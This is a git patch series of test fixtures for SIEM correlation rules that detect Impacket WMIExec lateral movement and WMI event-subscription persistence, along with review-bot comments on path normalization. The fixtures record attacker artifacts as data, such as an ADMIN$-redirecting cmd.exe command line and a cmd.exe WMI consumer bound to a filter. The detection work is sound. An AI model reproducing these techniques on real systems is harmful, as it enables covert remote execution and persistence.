"netstat -tulpn > 1.txt | type 1.txt"} 
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_5.sc b/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_5.sc
deleted file mode 100644
index 86a7fd25..00000000
--- a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_5.sc
+++ /dev/null
@@ -1,3 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-30T20:32:51.1685890Z\"},\"EventRecordID\":\"9826\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1964\",\"ThreadID\":\"1664\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-30 20:32:51.168\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-b0f3-5cc8-0000-00105f321d00}\"},{\"Name\":\"ProcessId\",\"text\":\"3840\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7601.17514 (win7sp1_rtm.101119-1850)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"cmd.exe /Q /c cd \\\\ 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__1556656369.7 
2>&1\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-b0f2-5cc8-0000-00203d311d00}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d313d\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-b0c0-5cc8-0000-001017c31c00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"836\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-b0f2-5cc8-0000-00203d311d00", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": 
"365abb72-b0f3-5cc8-0000-00105f321d00", "object.process.hash.imphash": "CEEFB55F764020CC5C5F8F23349AB163", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "3840", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\wbem\\wmiprvse.exe", "object.process.parent.guid": "365abb72-b0c0-5cc8-0000-001017c31c00", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T08:42:34.485Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-30T20:32:51.168Z", "type": "raw", "uuid": "4d37a299-56f3-4a2b-8d40-da1fcccbc1ad"} - -expect not {"correlation_name": "Impacket_WMIExec_Command_Executed"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_6.sc b/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_6.sc deleted file mode 100644 index 8c15a378..00000000 
--- a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_6.sc
+++ /dev/null
@@ -1,3 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-30T20:32:51.1685890Z\"},\"EventRecordID\":\"9826\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1964\",\"ThreadID\":\"1664\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-30 20:32:51.168\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-b0f3-5cc8-0000-00105f321d00}\"},{\"Name\":\"ProcessId\",\"text\":\"3840\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7601.17514 (win7sp1_rtm.101119-1850)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"cmd.exe /Q /c cd \\\\ 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__1556656369.7 
2>&1\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-b0f2-5cc8-0000-00203d311d00}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d313d\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-b0c0-5cc8-0000-001017c31c00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"836\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-b0f2-5cc8-0000-00203d311d00", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", 
"object.process.guid": "365abb72-b0f3-5cc8-0000-00105f321d00", "object.process.hash.imphash": "CEEFB55F764020CC5C5F8F23349AB163", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "3840", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\somepath\\wbem\\wmiprvse.exe", "object.process.parent.guid": "365abb72-b0c0-5cc8-0000-001017c31c00", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T08:42:34.485Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-30T20:32:51.168Z", "type": "raw", "uuid": "4d37a299-56f3-4a2b-8d40-da1fcccbc1ad"} - -expect not {"correlation_name": "Impacket_WMIExec_Command_Executed"} From 12617455525a3e71a18f75a2a0e7747bfe0ab167 Mon Sep 17 00:00:00 2001 
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Tue, 1 Aug 2023 11:45:13 +0300
Subject: [PATCH 39/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Change?= =?UTF-8?q?=5Fwmi=5Fsubscription)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../Change_wmi_subscription/tests/test_1.sc | 4 ++++
.../Change_wmi_subscription/tests/test_2.sc | 4 ++++
.../Change_wmi_subscription/tests/test_3.sc | 5 +++++
3 files changed, 13 insertions(+)
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_1.sc
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_2.sc
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_3.sc
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_1.sc
new file mode 100644
index 00000000..874debb6
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_1.sc
@@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"20\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"20\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-11 17:58:23.340658\"},\"EventRecordID\":\"16111\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2032\",\"ThreadID\":\"4092\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"EventType\",\"text\":\"WmiConsumerEvent\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-11 17:58:23.340\"},{\"Name\":\"Operation\",\"text\":\"Created\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"Name\",\"text\":\"\\\"BotConsumer23\\\"\"},{\"Name\":\"Type\",\"text\":\"Command Line\"},{\"Name\":\"Destination\",\"text\":\"\\\"c:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\"\"}]}}}", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_20_WMI_event_consumer_activity_detected", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "20", "normalized": true, "object": "resource", "object.name": "BotConsumer23", "object.state": "created", "object.storage.fullpath": "c:\\\\Windows\\\\System32\\\\cmd.exe", "object.storage.name": "cmd.exe", "object.storage.path": "c:\\\\Windows\\\\System32\\\\", "object.type": "Command Line", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T02:55:27.966Z", 
"status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-11T17:58:23.340Z", "type": "raw", "uuid": "fbcc62f0-3948-4a63-9c1f-2b899c9e9e0e"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "alert.context": "iewin7\\ieuser -> BotConsumer23: c:\\\\Windows\\\\System32\\\\cmd.exe", "alert.key": "BotConsumer23: c:\\\\Windows\\\\System32\\\\cmd.exe", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Event Triggered Execution", "correlation_name": "Change_wmi_subscription", "correlation_type": "incident", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Change_wmi_subscription|iewin7|synthetic:ieuser@iewin7", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "msgid": "20", "object": "resource", "object.name": "BotConsumer23", "object.storage.fullpath": "c:\\\\Windows\\\\System32\\\\cmd.exe", "object.storage.name": "cmd.exe", "object.storage.path": "c:\\\\Windows\\\\System32\\\\", "object.type": "Command Line", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_2.sc new file mode 100644 index 00000000..d4c61672 --- /dev/null 
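Review bot: In the expect block of test_1.sc, `object.storage.fullpath`, `object.storage.path` and `alert.key` keep the doubled backslashes and original case of the raw `Destination` value (`c:\\\\Windows\\\\System32\\\\cmd.exe`), while every other fixture in this series carries paths normalized to lower case with single separators (`c:\\windows\\system32\\cmd.exe`). This pins the un-normalized form into the rule's alert key, so a later normalizer fix for Sysmon event 20 would break the test, and any exclusion list that compares `object.storage.*` against canonical paths would not match; worth confirming that leaving the value as-is is intended before locking it in. The three Change_wmi_subscription fixtures (test_1, test_2, test_3) are all positive `expect 1` cases; unlike the Impacket_WMIExec tests removed earlier in this series there is no `expect not` fixture, for example an event whose `Operation` is not `Created`, to pin what the rule must ignore.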
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_2.sc 
@@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"21\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"21\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-11 17:58:23.418783\"},\"EventRecordID\":\"16112\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2032\",\"ThreadID\":\"4092\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"EventType\",\"text\":\"WmiBindingEvent\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-11 17:58:23.418\"},{\"Name\":\"Operation\",\"text\":\"Created\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"Consumer\",\"text\":\"\\\"CommandLineEventConsumer.Name=\\\\\\\"BotConsumer23\\\\\\\"\\\"\"},{\"Name\":\"Filter\",\"text\":\"\\\"__EventFilter.Name=\\\\\\\"BotFilter82\\\\\\\"\\\"\"}]}}}", "datafield1": "BotConsumer23", "datafield2": "BotFilter82", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_21_WMI_event_consumer_to_filter_activity_detected", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "21", "normalized": true, "object": "link", "object.name": "CommandLineEventConsumer.Name=\\\"BotConsumer23\\\"", "object.query": "__EventFilter.Name=\\\"BotFilter82\\\"", "object.state": "created", "object.type": "consumer-filter", "recv_ipv4": "127.0.0.1", "recv_time": 
"2023-06-07T02:55:27.970Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-11T17:58:23.418Z", "type": "raw", "uuid": "505b7ae4-ef8c-44a9-b0a4-2784cba74388"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "alert.context": "iewin7\\ieuser -> CommandLineEventConsumer.Name=\\\"BotConsumer23\\\" <-> __EventFilter.Name=\\\"BotFilter82\\\"", "alert.key": "CommandLineEventConsumer.Name=\\\"BotConsumer23\\\" <-> __EventFilter.Name=\\\"BotFilter82\\\"", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Event Triggered Execution", "correlation_name": "Change_wmi_subscription", "correlation_type": "incident", "datafield1": "BotConsumer23", "datafield2": "BotFilter82", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Change_wmi_subscription|iewin7|synthetic:ieuser@iewin7", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "msgid": "21", "object": "link", "object.name": "CommandLineEventConsumer.Name=\\\"BotConsumer23\\\"", "object.query": "__EventFilter.Name=\\\"BotFilter82\\\"", "object.type": "consumer-filter", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser"} 
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_3.sc
new file mode 100644
index 00000000..0da3ace3
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Change_wmi_subscription/tests/test_3.sc
@@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"19\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"19\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-11 17:58:39.746908\"},\"EventRecordID\":\"16115\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2032\",\"ThreadID\":\"4092\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"EventType\",\"text\":\"WmiFilterEvent\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-11 17:58:39.746\"},{\"Name\":\"Operation\",\"text\":\"Created\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"EventNamespace\",\"text\":\"\\\"root\\\\\\\\cimv2\\\"\"},{\"Name\":\"Name\",\"text\":\"\\\"BotFilter82\\\"\"},{\"Name\":\"Query\",\"text\":\"\\\"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\\\"\"}]}}}", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_19_WMI_event_filter_activity_detected", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "19", "normalized": true, "object": "resource", "object.fullpath": "root\\\\cimv2\\BotFilter82", "object.name": "BotFilter82", "object.path": "root\\\\cimv2", "object.query": "SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 
'Win32_PerfFormattedData_PerfOS_System'", "object.state": "created", "object.type": "event filter", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T03:11:36.186Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-11T17:58:39.746Z", "type": "raw", "uuid": "3a47e9dc-79a2-4bb8-a2d7-7bd4d7a4ccd0"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "alert.context": "iewin7\\ieuser -> root\\\\cimv2\\BotFilter82: SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", "alert.key": "iewin7\\ieuserroot\\\\cimv2\\BotFilter82", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Event Triggered Execution", "correlation_name": "Change_wmi_subscription", "correlation_type": "incident", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Change_wmi_subscription|iewin7|synthetic:ieuser@iewin7", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "msgid": "19", "object": "resource", "object.fullpath": "root\\\\cimv2\\BotFilter82", "object.name": "BotFilter82", "object.path": "root\\\\cimv2", "object.query": "SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", "object.type": "event filter", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": 
"ieuser"}
+
From 22be1eabe344c1b7469437241f396c92c1697901 Mon Sep 17 00:00:00 2001
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Tue, 1 Aug 2023 11:49:05 +0300
Subject: [PATCH 40/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Create=5Fhidden=5Flocal?= =?UTF-8?q?=5Faccount)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../Create_hidden_local_account/tests/test_1.sc | 4 ++++
1 file changed, 4 insertions(+)
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_hidden_local_account/tests/test_1.sc
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_hidden_local_account/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_hidden_local_account/tests/test_1.sc
new file mode 100644
index 00000000..f58d174f
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_hidden_local_account/tests/test_1.sc
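Review bot: The expect's `alert.key` value `iewin7\\ieuserroot\\\\cimv2\\BotFilter82` in Change_wmi_subscription/tests/test_3.sc fuses the subject (`iewin7\\ieuser`) and `object.fullpath` (`root\\\\cimv2\\BotFilter82`) with no delimiter, whereas `alert.context` in the same record puts ` -> ` between them and the test_1/test_2 keys include no subject at all. If the rule's key construction is missing a separator rather than this being intended, the rule and this expect should change together, e.g. `"alert.key": "iewin7\\ieuser -> root\\\\cimv2\\BotFilter82"`; as written the test locks the fused form in. `object.fullpath` also mixes a doubled separator (`root\\\\cimv2`), inherited from the quoted raw `EventNamespace`, with a single one before `BotFilter82`; that comes from the normalizer output rather than from this test, but it makes the key fragile against any later escaping change.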
